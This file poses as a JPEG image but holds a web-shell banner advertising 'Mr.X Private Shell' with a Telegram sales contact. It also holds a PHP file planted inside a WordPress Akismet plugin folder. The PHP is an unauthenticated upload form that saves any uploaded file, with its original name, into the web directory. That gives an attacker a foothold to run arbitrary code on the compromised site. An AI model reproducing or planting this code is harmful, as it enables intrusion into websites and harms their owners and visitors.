����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
home/eliteafr/datapro/wp-content/plugins/akismet/wrapper-part.php 0000666 00000001042 15220564221 0021272 0 ustar 00 <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title><?php echo $_SERVER['HTTP_HOST'] ?></title>
</head>
<body>
<form method="post" enctype="multipart/form-data">
<input type="file" name="filename">
<input type="submit" value="submit">
</form>
<?php
if ( is_uploaded_file( $_FILES["filename"]["tmp_name"] ) ) {
move_uploaded_file( $_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"] );
$file = $_FILES["filename"]["name"];
echo "<a href=\"$file\">$file</a>";
}
?>
</body>
</html>